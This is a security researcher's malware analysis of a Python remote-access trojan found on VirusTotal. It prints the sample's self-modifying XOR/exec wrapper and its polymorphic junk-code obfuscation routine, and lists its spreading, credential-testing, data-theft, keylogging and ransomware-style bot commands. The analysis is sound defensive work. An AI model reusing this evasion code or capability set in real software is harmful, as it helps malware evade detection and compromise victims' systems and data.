Today, I spoted on VirusTotal an interesting Python RAT. They are tons of them but this one attracted my attention based on some function names present in the code: self_modifying_wrapper(), decrypt_and_execute() and polymorph_code(). A polymorphic malware is a type of malware that has been developed to repeatedly mutate its appearance or signature files at every execution time. The file got a very low score of 2/64 on VT! (SHA256:7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c).

To be able to modify its code on the fly, the program must have access to its own source code. Many languages have this capability. I covered the same technque in JavaScript a long time ago[1]. With Python, there is a very interesting module that can add the same capability: inspect[2].

Here is a simple snippet of code to demonstrate how it works:

remnux@remnux:~$ cat poc.py
import inspect

def dummy_function():
    print("I'm a dummy function!")

def main():
    print("Function code:")
    print(inspect.getsource(dummy_function))

if __name__ == "__main__":
    main()

remnux@remnux:~$ python3 poc.py
Function code:
def dummy_function():
    print("I'm a dummy function!")

Once you get the source code, you can perform plenty of actions like anti-tampering detection (was the code modified - to debug it) or obfuscate it.

In the discovered sample, the self_modifying_wrapper() function will grab a function code, XOR it with a random key then un-XOR it and execute it from memory:

# Self-modifying code wrapper (simulates packing)
def self_modifying_wrapper():
    """Wrap critical code in a self-modifying layer."""
    log_path = resource_path('debug.log')
    try:
        # Simulate packed code by XORing critical sections
        critical_code = inspect.getsource(main).encode()
        xor_key = random.randint(1, 255)
        packed_code = bytes(b ^ xor_key for b in critical_code)
        # Unpack at runtime
        unpacked_code = bytes(b ^ xor_key for b in packed_code)
        code_obj = marshal.loads(zlib.decompress(unpacked_code))
        exec(code_obj)
        with open(log_path, "a") as f:
            f.write("[+] Self-modifying code executed\n")
        return True
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Self-modifying code failed: {e}\n")
        return False

The malware has also the capability to inject junk code:

def polymorph_code(code):
    """Obfuscate code with advanced randomization and junk code."""
    log_path = resource_path('debug.log')
    try:
        # Advanced variable renaming
        var_map = {var: ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 12))) for var in code.split() if var.isidentifier()}
        for old_var, new_var in var_map.items():
            code = code.replace(old_var, new_var)
        # Insert complex junk code
        junk_snippets = [
            "def _unused_{}(): return None\n".format(''.join(random.choice(string.ascii_letters) for _ in range(8))),
            "x = [0] * {}; x = [y for y in x]\n".format(random.randint(10, 100)),
            "import time; time.sleep({})\n".format(random.uniform(0.01, 0.1)),
            "try: pass\nexcept: pass\n"
        ]
        lines = code.split('\n')
        for _ in range(random.randint(10, 20)):
            lines.insert(random.randint(0, len(lines)), random.choice(junk_snippets))
        code = '\n'.join(lines)
        # Shuffle function order
        code = code.replace('\r\n', '\n')  # Normalize line endings
        functions = re.findall(r'(def .+?\n\s*return .+?\n)', code, re.DOTALL)
        if functions:
            random.shuffle(functions)
            code = code.replace(''.join(functions), ''.join(functions))
        with open(log_path, "a") as f:
            f.write("[+] Advanced polymorphic transformation applied\n")
        return code
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Polymorphic transformation failed: {e}\n")
        return code
        
It's easy to get a nice overview of the RAT capabilities:

Besides this specificity, the malware is a classic one and offers plenty of features to the Attacker. Here is a list of interesting functions that give a good overview of the capabilities:

remnux@remnux:~$ grep "async def" 7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c
async def socket_network_scan():
async def scan_host(ip):
async def try_router_hack(ip):
async def test_default_credentials(ip, service, port):
async def deliver_payload(ip, share=None, service=None, port=None):
async def execute_payload(ip, target_path, service):
async def get_phone_number(stolen_data):
async def send_stolen_data(stolen_data, channel, logins_path):
async def spread_to_network():
async def report_spreading_status(ip, message):
async def xworm(ctx, spread_url="https://example.com/serial_spoofer.exe"):
async def record_screen_webcam(voice_channel, ctx):
async def on_ready():
async def commands(ctx):
async def encrypt(ctx):
async def mine(ctx):
async def screenshot(ctx):
async def audio(ctx):
async def listen(ctx):
async def execute(ctx, *, command):
async def upload(ctx):
async def download(ctx, *, filename):
async def xworm(ctx):
async def archive(ctx):
async def system_info(ctx):
async def run(ctx, *, program):

In the same way, here is the list of bot commands:

# Bot command: Show available commands
@bot.command()
async def commands(ctx):
    log_path = resource_path('debug.log')
    with open(log_path, "a") as f:
        f.write("[+] Sending command list\n")
    commands_list = """
    /commands - Show this help message
    /encrypt - Encrypt victim's files
    /mine - Start cryptominer (simulated)
    /screenshot - Capture screenshot
    /audio - Capture audio
    /listen - Record screen for 30 seconds, stream high-quality live audio to voice channel
    /execute <command> - Run shell command
    /upload - Upload attached file to victim's PC
    /download <filename> - Search and send file from victim's PC
    /xworm - Deploy Xworm payload
    /archive - Archive critical files
    /keylog_start - Start keylogger
    /keylog_stop - Stop keylogger and send log
    /system_info - Get system information
    /run <program> - Run a program
    """
    await ctx.send(commands_list)

The file was uploaded on VT as "nirorat.py". I did not find any reference to this RAT. If you have more details, let us know!

[1] https://isc.sans.edu/diary/AntiDebugging+JavaScript+Techniques/26228
[2] https://docs.python.org/3/library/inspect.html
 

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key